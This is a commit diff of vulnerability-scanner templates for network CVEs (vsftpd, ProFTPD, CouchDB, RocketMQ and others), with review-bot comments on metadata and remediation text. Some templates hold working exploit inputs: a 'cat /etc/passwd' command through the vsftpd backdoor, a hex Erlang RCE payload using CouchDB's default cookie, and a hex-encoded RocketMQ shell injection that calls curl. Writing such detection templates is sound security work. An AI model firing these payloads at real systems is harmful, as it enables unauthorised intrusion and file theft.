Updated network CVEs
parent
e418b30d19
commit
1bab419ce5
|
@ -5,12 +5,12 @@ info:
|
|||
author: iamthefrogy
|
||||
severity: high
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
- http://www.kb.cert.org/vuls/id/684820
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6603
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 7.5
|
||||
|
|
|
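Review bot: the reference list in this hunk carries the same CERT note twice, once as https://www.kb.cert.org/vuls/id/684820 and once as http://www.kb.cert.org/vuls/id/684820; keep only the https entry. The remediation "Upgrade to SSH 2.4 or later" also names no product, while the description is about the SSHv1 protocol. Either say which implementation that version number refers to, or state the fix in protocol terms (disable protocol version 1).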
@ -6,14 +6,14 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
|
||||
remediation: |
|
||||
Update to the latest version of VSFTPD, which does not contain the backdoor.
|
||||
reference:
|
||||
- https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
|
||||
- https://www.exploit-db.com/exploits/49757
|
||||
- http://packetstormsecurity.com/files/162145/vsftpd-2.3.4-Backdoor-Command-Execution.html
|
||||
- https://access.redhat.com/security/cve/cve-2011-2523
|
||||
- https://security-tracker.debian.org/tracker/CVE-2011-2523
|
||||
remediation: |
|
||||
Update to the latest version of VSFTPD, which does not contain the backdoor.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -22,15 +22,14 @@ info:
|
|||
epss-score: 0.87236
|
||||
cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
verified: true
|
||||
shodan-query: product:"vsftpd"
|
||||
max-request: 2
|
||||
vendor: vsftpd_project
|
||||
product: vsftpd
|
||||
shodan-query: product:"vsftpd"
|
||||
tags: cve,cve2011,network,vsftpd,ftp,backdoor
|
||||
variables:
|
||||
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Host}}:21"
|
||||
|
|
|
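Review bot: the inline comment on the cmd variable has a doubled word ("shows the the user"); fix it while this block is being touched. The variable also means the check runs cat /etc/passwd on the scanned host, yet the tags line lacks the intrusive tag that the RocketMQ template in this same commit carries. Consider adding it so that runs which filter on that tag treat this template the same way.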
@ -5,13 +5,13 @@ info:
|
|||
author: pdteam
|
||||
severity: critical
|
||||
description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
|
||||
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
|
||||
reference:
|
||||
- https://github.com/t0kx/exploit-CVE-2015-3306
|
||||
- https://www.exploit-db.com/exploits/36803/
|
||||
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
|
||||
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-3306
|
||||
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
|
||||
cvss-score: 10
|
||||
|
@ -24,7 +24,6 @@ info:
|
|||
vendor: proftpd
|
||||
product: proftpd
|
||||
tags: cve,cve2015,ftp,rce,network,proftpd,edb
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
@ -5,14 +5,14 @@ info:
|
|||
author: pussycat0x
|
||||
severity: critical
|
||||
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
|
||||
remediation: |
|
||||
Upgrade to the most recent version of HP Data Protector.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/39858
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
|
||||
- http://www.kb.cert.org/vuls/id/267328
|
||||
- https://www.exploit-db.com/exploits/39858/
|
||||
- http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
|
||||
remediation: |
|
||||
Upgrade to the most recent version of HP Data Protector.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
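Review bot: two reference entries in this hunk point at the same Exploit-DB page and differ only by a trailing slash (https://www.exploit-db.com/exploits/39858 and https://www.exploit-db.com/exploits/39858/); drop one. The description says "HPE Data Protector" while the remediation says "HP Data Protector"; pick one name. Since the description lists the fixed builds (7.03_108, 8.15, 9.06), the remediation could name them instead of "the most recent version".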
@ -25,7 +25,6 @@ info:
|
|||
vendor: hp
|
||||
product: data_protector
|
||||
tags: cve,cve2016,network,iot,hp,rce,edb
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
|
||||
remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
|
||||
reference:
|
||||
- https://github.com/artkond/cisco-rce
|
||||
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
|
||||
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-3881
|
||||
- http://www.securitytracker.com/id/1038059
|
||||
remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
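Review bot: the remediation line "Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access" reads as if a single session were to be closed. The description puts the exposure on devices "configured to accept Telnet connections", so the advice should be to disable Telnet as an incoming management protocol, or to restrict it with ACLs. Reword it along those lines.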
@ -25,7 +25,6 @@ info:
|
|||
vendor: cisco
|
||||
product: ios
|
||||
tags: cve,cve2017,cisco,rce,network,kev,msf
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
@ -6,14 +6,14 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
|
||||
remediation: |
|
||||
Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5645
|
||||
- http://www.openwall.com/lists/oss-security/2019/12/19/2
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
|
||||
remediation: |
|
||||
Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
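Review bot: the remediation text does not match the vulnerability described in this hunk. The description covers deserialization of log events by the TCP or UDP socket server in Log4j 2.x before 2.8.2, but the remediation talks about 2.15.0 and JNDI lookups, which is a different issue. Reword it to name 2.8.2 or later, as the description does, and to advise against exposing the socket server to untrusted senders.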
@ -26,10 +26,8 @@ info:
|
|||
vendor: apache
|
||||
product: log4j
|
||||
tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast,
|
||||
|
||||
variables:
|
||||
end: "\r\n"
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
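Review bot: the tags line ends with a trailing comma ("...,deserialization,oast,"), which leaves an empty final tag. Remove the comma so the list ends at oast.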
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
|
||||
remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory
|
||||
reference:
|
||||
- https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-2628
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
|
||||
- http://web.archive.org/web/20211207132829/https://securitytracker.com/id/1040696
|
||||
- http://www.securitytracker.com/id/1040696
|
||||
remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -25,7 +25,6 @@ info:
|
|||
vendor: oracle
|
||||
product: weblogic_server
|
||||
tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
@ -5,13 +5,13 @@ info:
|
|||
author: milo2012
|
||||
severity: critical
|
||||
description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
|
||||
remediation: https://access.redhat.com/solutions/4851251
|
||||
reference:
|
||||
- https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-1938
|
||||
- https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
|
||||
- https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
|
||||
- http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
|
||||
remediation: https://access.redhat.com/solutions/4851251
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
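Review bot: the remediation field here is a bare URL (https://access.redhat.com/solutions/4851251) rather than guidance, so anyone reading scan output has to follow a vendor link to learn the fix. The description already gives the fixed releases (9.0.31, 8.5.51, 7.0.100) and says mitigation is needed only where the AJP port is reachable by untrusted users. Put that in the remediation text and move the URL into the reference list.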
@ -21,11 +21,10 @@ info:
|
|||
cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 4
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
vendor: apache
|
||||
product: geode
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
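Review bot: the cpe and product values in this hunk name Apache Geode (cpe:2.3:a:apache:geode:1.12.0 and product: geode), while the shodan-query and the tags both identify the template as an Apache Tomcat check. Asset matching on product or CPE will attribute findings to the wrong software. If the values were taken automatically from the CVE's CPE list, override them with the Tomcat entry.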
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
|
||||
remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
|
||||
reference:
|
||||
- https://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247
|
||||
- https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
|
||||
- http://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
- http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
|
||||
remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
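Review bot: the openwall advisory is listed twice in the references, as https://www.openwall.com/lists/oss-security/2020/01/28/3 and again with the http scheme; keep one. The remediation is also narrower than the description: it addresses only OpenBSD 6.6 users, while the description says OpenSMTPD 6.4.0 - 6.6.1 is affected "as used in OpenBSD 6.6 and other products". Add guidance for OpenSMTPD installs on other platforms.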
@ -5,6 +5,7 @@ info:
|
|||
author: Y4er
|
||||
severity: critical
|
||||
description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
|
||||
remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
|
||||
reference:
|
||||
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
|
||||
|
@ -12,7 +13,6 @@ info:
|
|||
- https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
|
||||
- http://www.openwall.com/lists/oss-security/2022/02/11/4
|
||||
- https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
|
||||
remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.1
|
||||
|
|
|
@ -9,13 +9,13 @@ info:
|
|||
vulnerability was introduced by Debian and Ubuntu Redis packages that
|
||||
insufficiently sanitized the Lua environment. The maintainers failed to
|
||||
disable the package interface, allowing attackers to load arbitrary libraries.
|
||||
remediation: Update to the most recent versions currently available.
|
||||
reference:
|
||||
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
|
||||
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
|
||||
- https://bugs.debian.org/1005787
|
||||
- https://www.debian.org/security/2022/dsa-5081
|
||||
- https://lists.debian.org/debian-security-announce/2022/msg00048.html
|
||||
remediation: Update to the most recent versions currently available.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
|
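Review bot: the remediation "Update to the most recent versions currently available" does not say what to update. The description attributes the flaw to the Debian and Ubuntu Redis packages rather than to upstream Redis, and the references include DSA-5081, so the text should direct readers to the fixed distribution packages from that advisory.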
@ -24,11 +24,10 @@ info:
|
|||
cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 4
|
||||
shodan-query: redis_version
|
||||
vendor: redis
|
||||
product: redis
|
||||
shodan-query: redis_version
|
||||
tags: cve,cve2022,network,redis,unauth,rce,kev
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
@ -6,14 +6,14 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
|
||||
remediation: |
|
||||
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50914
|
||||
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
|
||||
- http://www.openwall.com/lists/oss-security/2022/04/26/1
|
||||
- http://www.openwall.com/lists/oss-security/2022/05/09/1
|
||||
remediation: |
|
||||
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -22,19 +22,17 @@ info:
|
|||
epss-score: 0.97407
|
||||
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
shodan-query: product:"CouchDB"
|
||||
verified: "true"
|
||||
max-request: 2
|
||||
vendor: apache
|
||||
product: couchdb
|
||||
shodan-query: product:"CouchDB"
|
||||
tags: cve,cve2022,network,couch,rce,kev
|
||||
|
||||
variables:
|
||||
name_msg: "00156e00050007499c4141414141414041414141414141"
|
||||
challenge_reply: "00157201020304"
|
||||
cookie: "monster"
|
||||
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
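Review bot: the metadata block has verified: "true" as a quoted string, whereas the vsftpd, muhttpd and RocketMQ templates in this commit use the unquoted boolean verified: true. Use the boolean form here so that anything consuming the field sees one type across templates.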
@ -6,13 +6,13 @@ info:
|
|||
severity: high
|
||||
description: |
|
||||
muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
|
||||
remediation: Update the application to version 1.10
|
||||
reference:
|
||||
- https://derekabdine.com/blog/2022-arris-advisory.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
|
||||
- https://derekabdine.com/blog/2022-arris-advisory
|
||||
- https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/
|
||||
- http://inglorion.net/software/muhttpd/
|
||||
remediation: Update the application to version 1.10
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
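Review bot: the remediation "Update the application to version 1.10" is hard to reconcile with the description, which says "1.1.5 and before" are affected; as written, 1.10 can be read as a release older than 1.1.5. Confirm the fixed version against the advisory in the references and write it in the same three-part form. The advisory is also listed twice (derekabdine.com/blog/2022-arris-advisory.html and the same path without .html); keep one.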
@ -21,12 +21,11 @@ info:
|
|||
epss-score: 0.25931
|
||||
cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: inglorion
|
||||
product: muhttpd
|
||||
tags: cve,cve2022,network,muhttpd,lfi,unauth
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
|
|
|
@ -6,13 +6,13 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .
|
||||
remediation: Update the RocketMQ application to version 5.1.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-33246
|
||||
- https://github.com/I5N0rth/CVE-2023-33246
|
||||
- http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html
|
||||
- http://www.openwall.com/lists/oss-security/2023/07/12/1
|
||||
- https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp
|
||||
remediation: Update the RocketMQ application to version 5.1.1
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
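Review bot: the remediation names only version 5.1.1, but the description in the same hunk says users should upgrade to "5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x". Include the 4.9.6 path so that 4.x operators are not told to move to a different major line. The description's point about NameServer, Broker and Controller being exposed without permission checks also justifies a line on restricting network access to those components.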
@ -21,14 +21,13 @@ info:
|
|||
epss-score: 0.95581
|
||||
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
fofa-query: protocol="rocketmq"
|
||||
max-request: 2
|
||||
shodan-query: title:"RocketMQ"
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: apache
|
||||
product: rocketmq
|
||||
shodan-query: title:"RocketMQ"
|
||||
fofa-query: protocol="rocketmq"
|
||||
tags: cve,cve2023,rocketmq,rce,oast,intrusive,network
|
||||
|
||||
variables:
|
||||
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
|
||||
part_b: '{{ hex_decode("3b0a") }}'
|
||||
|
|
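Review bot: the two helper calls in the variables block are written inconsistently: part_a uses '{{ hex_decode ("...") }}' with a space before the parenthesis, while part_b uses '{{ hex_decode("3b0a") }}'. Normalise to the part_b form. A short comment above part_a on what the decoded header and body fields are would also let a reviewer check the request without decoding the hex by hand.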